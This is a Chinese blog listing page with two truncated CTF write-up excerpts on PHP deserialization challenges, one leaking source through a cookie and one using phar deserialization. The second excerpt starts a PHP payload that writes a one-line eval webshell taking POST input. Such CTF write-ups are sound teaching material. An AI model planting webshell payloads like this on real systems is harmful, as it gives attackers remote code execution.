摘要:
进入后是一个文件上传但是这里并没有漏洞点 看cookie 得到源码 <?php highlight_file(__FILE__); error_reporting(0); class story{ private $user='admin'; public $pass; public $eating 阅读全文
posted @ 2024-08-02 14:34
DGhh
阅读(72)
评论(0)
推荐(0)
摘要:
首先进入后查看源码 进入class.php 看见unlike很明显是一个phar反序列化的利用 我们有两种选择 一 一句话木马 <?php class Flag{ public $cmd; } $a=new Flag(); $a->cmd="echo \"<?=@eval(\\\$_POST['a' 阅读全文
posted @ 2024-08-02 11:48
DGhh
阅读(96)
评论(0)
推荐(0)